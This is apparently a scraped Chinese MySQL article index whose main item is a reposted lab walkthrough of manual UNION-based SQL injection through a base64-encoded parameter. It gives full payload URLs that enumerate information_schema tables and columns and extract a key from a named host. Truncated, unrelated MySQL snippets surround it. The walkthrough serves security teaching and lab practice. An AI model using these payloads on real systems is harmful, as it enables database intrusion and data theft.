mysql项目实例
),获得连接库需用到的5个参数,在_init_初始类属性时,建立连接,代码如下:import pymysqlfrom configparser import ConfigParserclass Mys...
2024.11.15说明:下面的URL为了让读者可以看清,所以没有进行URL的base64加密,但是读者在执行前需要对其进行base64加密,之后才可以正常执行!本次靶场操作以个人的实验环境为例。
首先从我实验的靶场可以看到该URL中存在一个参数,从参数的格式来看是通过了base64进行了加密,那么我们可以对其进行base64解密。
发现解密之后的参数为1,这种类型的注入除了和我们以前的普通注入相比只是多了一个“base64”加密的过程,下面进行手工注入演示:
1、判断是否可以注入:
and 测试;
由上判断可以得知存在SQL注入。
2、猜解字段长度
order by 2
order by 3
可以猜到字段长度为2。
3、爆数据库名、数据库版本信息
4、爆表名
http://219.153.49.228:48204/show.php?id=-1unionselect TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA=0x74657374 limit 0,1--
5、爆字段名
http://219.153.49.228:48204/show.php?id=-1unionselect COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME=0x64617461 limit 3,1
6、爆字段值
http://219.153.49.228:48204/show.php?id=-1unionselect thekey,2 from test.data limit 0,1--
至此得到最后的内容!
转载:https://blog.csdn.net/fly_hps/article/details/80208384
),获得连接库需用到的5个参数,在_init_初始类属性时,建立连接,代码如下:import pymysqlfrom configparser import ConfigParserclass Mys...
2024.11.15很多场景下,我们需要查看 MySQL 中表注释,或者是某张表下所有字段的注释,所以本文就来盘点和对比一下查询注释的几种方式。创建测试数据库开始之前咱们先创建一个数据库,以备下面演示使用。-- 如果存在...
2024.11.15有时为了方便开发者调试,有的网站会开启错误调试信息,部分代码如sql3.php所示。此时,只要触发SQL语句的错误,即可在页面上看到错误信息,见图1。这种攻击方式则是因为MySQL会将语句执行后的报错...
2024.11.12mysql导入文件,过大导致错误(2006 - MySQL server has gone away)出现这个问题的原因一般是传送的数据过大,解决的办法是修改通信缓冲区的最大长度。#查看通信缓冲区长度...
2024.11.11前言:随着互联网技术的不断发展, MySQL 相关生态也越来越完善,越来越多的工具涌现出来。一些公司或个人纷纷开源出一些不错的工具,本篇文章主要介绍几款 MySQL 相关实用工具。提醒下,这里并不介绍...
2024.11.11